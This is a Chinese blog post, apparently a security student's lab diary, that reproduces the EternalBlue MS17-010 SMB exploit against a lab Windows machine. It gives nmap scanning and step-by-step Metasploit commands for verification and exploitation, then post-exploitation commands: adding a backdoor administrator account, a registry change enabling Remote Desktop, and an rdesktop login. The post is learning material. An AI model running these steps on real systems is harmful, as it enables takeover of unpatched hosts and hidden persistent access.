网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)

已于 2023-03-10 11:53:53 修改
阅读量1.1k 收藏 10
点赞数
分类专栏: 远程代码执行 文章标签: 学习 安全 网络 Powered by 金山文档
于 2023-03-10 10:30:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyc_0/article/details/129436049
版权

一、漏洞原理简介

MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。

函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。

二、漏洞发现

  1. 扫描本网段存活的主机

nmap -T4 -sS -sC -sV 192.168.180.0/24

这里我们发现靶机开启445端口,而我们ms17-010利用的就是445端口的SMB服务

三、测试漏洞

1、打开kali中msfconsole漏洞测试平台

  1. 搜索ms17-010漏洞测试模块

search ms17-010

3、我们使用kali中的漏洞验证模块,验证靶机是否存在ms17-010漏洞

use 3

4、查看该模块需要配置的参数

show options

5、设置靶机IP

set RHOSTS 192.168.180.129

6、运行漏洞验证模块

run

验证成功发现目标靶机存在ms17-010漏洞

7、进行渗透测试

使用漏洞攻击模块

use exploit/windows/smb/ms17_010_eternalblue

8、设置靶机IP

set RHOSTS 192.168.180.129

9、运行漏洞攻击模块

run

成功拿到靶机shell

四、漏洞利用

我们可以使用该漏洞做很多事情,这里简单演示通过shell对靶机进行远程控制

1、创建一个新用户

这里我们创建了一个用户名为user密码为P@ssw0rd的用户

2、对user用户提权,添加到超级管理员组

net localgroup administrators user /add

3、开启远程桌面

我们先查看靶机3389端口开启情况

netstat -ano

这里没有看到3389端口开启,我们手动开启

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

再次查看端口开启情况

发现已经开启

4、连接远程桌面

rdesktop 192.168.180.129:3389

我们用刚刚创建的user用户登录

登录成功,实验结束

Attach_1
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
方程式工具-永恒之蓝 Windows 2008 r2 安装补丁
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之蓝)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之蓝)[原理扫描] 【3】Microsoft Windows SMB...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
ms17-010永恒之蓝漏洞复现与处理
热门推荐
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
记录一次永恒之蓝ms17-010漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3780
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25 5375
永恒之蓝ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
ms17-010 永恒之蓝
qq_62803993的博客
01-12 3676
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝 ms17_010漏洞
qq_64501184的博客
11-28 999
漏洞复现
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
远程溢出漏洞利用程序
06-08
远程溢出工具非常好用的!应该会与很多人用到的。360会查。使用请关了360.
81-81.渗透测试-永恒之蓝利用原理和方法CVE-2017-0144.mp4
最新发布
05-10
81-81.渗透测试-永恒之蓝利用原理和方法CVE-2017-0144.mp4
勒索病毒尝试解决方法
灵感点滴的分享
05-16 7888
解决方案 该攻击涉及MS17-010漏洞,我们可以采用以下方案进行解决 漏洞名称: Microsoft Windows SMB远程任意代码执行漏洞 (MS17-010) 包含如下CVECVE-2017-0143 严重 远程命令执行 CVE-2017-0144 严重 远程命令执行 CVE-2017-0145 严重 远程命令执行 CVE-2017-0146 严重 远程命令执行
MS17-010 漏洞利用
weixin_45095113的博客
12-13 1370
MS17-010 漏洞利用
风险类型说明和处理建议手册
tigerman20201的博客
08-20 1047
.1 Web攻击 风险描述: 主要是指常见的Web类型攻击,包括SQL注入、命令注入、代码注入、跨站脚本攻击、协议错误等,一般是由攻击人员尝试构造特殊的SQL语句、系统命令、脚本、java代码等,发送请求,来触发WEB服务器上未经发现的,或者未经修复的漏洞,然后利用这些漏洞,进行恶意行为:获取敏感数据,执行数据库操作、操作系统命令/程序代码等。 处理建议 1、首先需确认攻击源和目标主机所处网络位置,对于内网向外发起的攻击行为,建议通过对源主机进行访问限制阻止攻击行为,并检查该内部主机是否有其他
smb(ms17-010)远程命令执行之msf
weixin_30270561的博客
05-03 314
本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 具体的步骤如下: kali系统下安装wine32: apt-get install wine32 用wine32执行cmd.exe wine cmd.exe ex...
ms17-010漏洞复现
m0_56368726的博客
12-15 2147
一、漏洞原理 1、简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 SMB协议是一个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和进程间通信服务等,还可以实现客户端和服务器之间的远程过程子协议的认证传输。 Windows的SMB服务处理 SMBv1接收的特殊设计的数据包,发生缓冲区溢出,导致攻击者在目标系统上可以执行任意代码。
ms17-010直接拿meterpreter权限
qq_38240166的博客
03-07 8318
小白,第一次写博客,轻喷写的不好请指出最近无聊就装了个msf玩玩ms17-010,只要你开了445端口,又没打补丁,那就很容易gg先开个msf进一下利用模块。然后简单的设置一下ip和payload。设置完开始攻击这样子就获得一个会话。输入shell看看发现乱码,调一下编码就行了。第一次玩msf,所以看了两天的书才搞懂这些...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值